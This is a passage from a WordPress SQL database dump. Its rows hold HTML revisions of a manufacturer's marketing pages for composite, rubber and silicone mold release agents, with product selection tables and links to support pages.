href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:\r\n<ul>\r\n 	<li>Thermoset Epoxies, Phenolics, and BMIs</li>\r\n 	<li>Thermoset Prepregs</li>\r\n 	<li>Potting and Casting Resins</li>\r\n 	<li>Hand lay-ups</li>\r\n 	<li>Filament Winding</li>\r\n 	<li>Autoclave molding</li>\r\n 	<li>Vacuum bag molding</li>\r\n 	<li>Resin transfer molding</li>\r\n 	<li>Resin film infusion</li>\r\n 	<li>Compression, Transfer, Injection Molding</li>\r\n 	<li>Rotational Molding</li>\r\n 	<li>Metallic, Ceramic, and Composite Tooling</li>\r\n</ul>\r\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\r\nMiller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.\r\n<ul>\r\n 	<li>Water-based options for reducing environmental impact and improving facility HSE</li>\r\n 	<li>Flexibility to accommodate a wide range of process conditions</li>\r\n 	<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\r\n 	<li>Cost-effective, high durability, and consistent mold release</li>\r\n 	<li>Reduced downtime and scrap rates</li>\r\n 	<li>Minimal mold fouling and transfer</li>\r\n</ul>\r\n<h2><strong>Release Agent Selection Guide:</strong></h2>\r\n<table width="751">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="122">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="153">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="151">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\r\n</td>\r\n<td style="text-align: center;" width="203">\r\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\r\n<td style="text-align: center;">Medium  Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\r\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\r\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\r\n<td style="text-align: center;">PTFE Dry Film</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">No transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Matte</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\r\n<td style="text-align: center;">Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">High Durability; High Slip</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\r\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\r\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\r\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\r\n<td style="text-align: center;">Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Minimal transfer; No Build up</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[ux_product_categories number="10" parent="0" columns="4" title="Composite Mold Release Agents" ]\r\n\r\n&nbsp;', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-09 14:11:36', '2016-11-09 14:11:36', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2961, 2, '2016-11-09 14:12:21', '2016-11-09 14:12:21', '<h1>Composite Mold Release Agents - ReleaSys™</h1>\n<p>Miller-Stephenson Composite mold release agents are backed by over 40 years of technical experience and are trusted to deliver the most consistent release of composite material in the industry. Our formulations are uniquely tailored to yield  These wax- and silicone-free release agents crosslink to create a low surface energy film which exhibits high slip, superior durability, chemical resistant and thermally stable. Large and small manufacturers can expect higher productivity and profitability through reduced downtime, increased acceptance rates and improved part quality when switching to<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson’s ReleaSys semi-permanent line</a> </strong>or<strong> <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/">PTFE Dry Flim Release Agents</a>.</strong> With our composite mold release agents operators will see minimal transfer to molded components, low clogging, easy application and the highest number of releases possible per application <em>guaranteed. </em>As a leader in the development of water-based products, Miller-Stephenson offers environmentally conscious technology for composite molders who require the same, uncompromised high levels of quality and performance as found in traditional solvent-based products. Benefits of utilizing our mold release agents include:</p>\n<ul>\n<li>Low or No volatile organic compounds (VOC)</li>\n<li>Minimal odor; 100% Non-flammable formulations</li>\n<li>Semi-permanent mold release bonds to mold surface for consistent release</li>\n<li>Higher productivity; Increased cost-effectiveness</li>\n<li>Low rejection rate; Consistent part quality</li>\n</ul>\n<p>Miller-Stephenson composite <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/">mold release agents</a> have been optimized to cover industry applications from Fiber Reinforced Plastic (FRP) to advanced composites and from aerospace applications to automotive, construction, marine, recreational/sporting goods, wind energy and more. Both ReleaSys and our PTFE Dry Film release agents will provide exceptional utility, improving molding processes such as vacuum bagging, resin infusion, layup and etc. Our products are applicable in all manufacturing process such as:</p>\n<ul>\n<li>Thermoset Epoxies, Phenolics, and BMIs</li>\n<li>Thermoset Prepregs</li>\n<li>Potting and Casting Resins</li>\n<li>Hand lay-ups</li>\n<li>Filament Winding</li>\n<li>Autoclave molding</li>\n<li>Vacuum bag molding</li>\n<li>Resin transfer molding</li>\n<li>Resin film infusion</li>\n<li>Compression, Transfer, Injection Molding</li>\n<li>Rotational Molding</li>\n<li>Metallic, Ceramic, and Composite Tooling</li>\n</ul>\n<h3>Advantages of Utilizing Miller-Stephenson Composite Mold Release Agents</h3>\n<p>Miller-Stephenson combines great technical and industry knowledge with a hands-on approach to service and support to address the challenges faced by our customers in their composite molding operations. Beyond the basics of releasing finished parts from their molds, utilizing our robust portfolio of <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">ReleaSys semi-permanents mold release agents</a> and<a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/ptfe-release-agents/"> PTFE Dry Film release agents</a>, along with our industry leading support network, brings significant operational benefits.</p>\n<ul>\n<li>Water-based options for reducing environmental impact and improving facility HSE</li>\n<li>Flexibility to accommodate a wide range of process conditions</li>\n<li>A global network of support experts to work with you to eliminate bottlenecks and improve process flow</li>\n<li>Cost-effective, high durability, and consistent mold release</li>\n<li>Reduced downtime and scrap rates</li>\n<li>Minimal mold fouling and transfer</li>\n</ul>\n<h2><strong>Release Agent Selection Guide:</strong></h2>\n<table width="751">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product Type</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="122">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Application</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="153">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Finish</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="151">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Product</span></strong></span></span></h3>\n</td>\n<td style="text-align: center;" width="203">\n<h3><span style="text-decoration: underline;"><span style="color: #0000ff; text-decoration: underline;" data-text-color="primary"><strong><span style="font-size: 100%;">Description</span></strong></span></span></h3>\n</td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Compression Molding, Casting, Vacuum Bagging</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="font-size: 110%;">ReleaSys 8500</span></a></strong></td>\n<td style="text-align: center;">Medium  Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122">Solvent /PTFE Dry Film</td>\n<td style="text-align: center;" rowspan="4" width="122">Resin Potting and Casting</td>\n<td style="text-align: center;" rowspan="4">Matte-Dry</td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;"><strong><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/">MS-122AV</a></strong> or <strong><a href="https://www.miller-stephenson.com/product/ptfe-mold-release-agents/">MS-143TE</a></strong></span></td>\n<td style="text-align: center;">PTFE Dry Film</td>\n</tr>\n<tr>\n<td style="text-align: center;">No transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal Rejection Rate</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td style="text-align: center;"></td>\n<td style="text-align: center;"></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Water-Based / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3">High Slip</td>\n<td style="text-align: center;" rowspan="3">Matte</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="font-size: 110%;">ReleaSys 8800</span></a></strong></td>\n<td style="text-align: center;">Instant Cure</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer</td>\n</tr>\n<tr>\n<td style="text-align: center;">High Durability; High Slip</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">Filament Winding</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n<tr>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n<td></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122">Solvent / Semi-Permanent</td>\n<td style="text-align: center;" rowspan="3" width="122">High Performance Composites</td>\n<td style="text-align: center;" rowspan="3">Matte-Satin</td>\n<td style="text-align: center;" rowspan="3"><strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/"><span style="font-size: 110%;">ReleaSys 8900</span></a></strong></td>\n<td style="text-align: center;">Highest Slip</td>\n</tr>\n<tr>\n<td style="text-align: center;">Minimal transfer; No Build up</td>\n</tr>\n<tr>\n<td style="text-align: center;">Fast Cure (3-5min @ 50 °C)</td>\n</tr>\n</tbody>\n</table>\n<h3>Technical or Application Support:</h3>\n<ul>\n<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\n<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\n</ul>\n[ux_product_categories ids="21,16" number="10"]\n\n<p>&nbsp;</p>', 'Composite Mold Release Agents | ReleaSys™', '', 'inherit', 'closed', 'closed', '', '2936-revision-v1', '', '', '2016-11-09 14:12:21', '2016-11-09 14:12:21', '', 2936, 'https://www.miller-stephenson.com/2936-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2962, 2, '2016-11-09 15:25:24', '2016-11-09 15:25:24', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\n\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\nOur ReleaSys™ mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\n<table style="height: 1010px;" width="829">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant 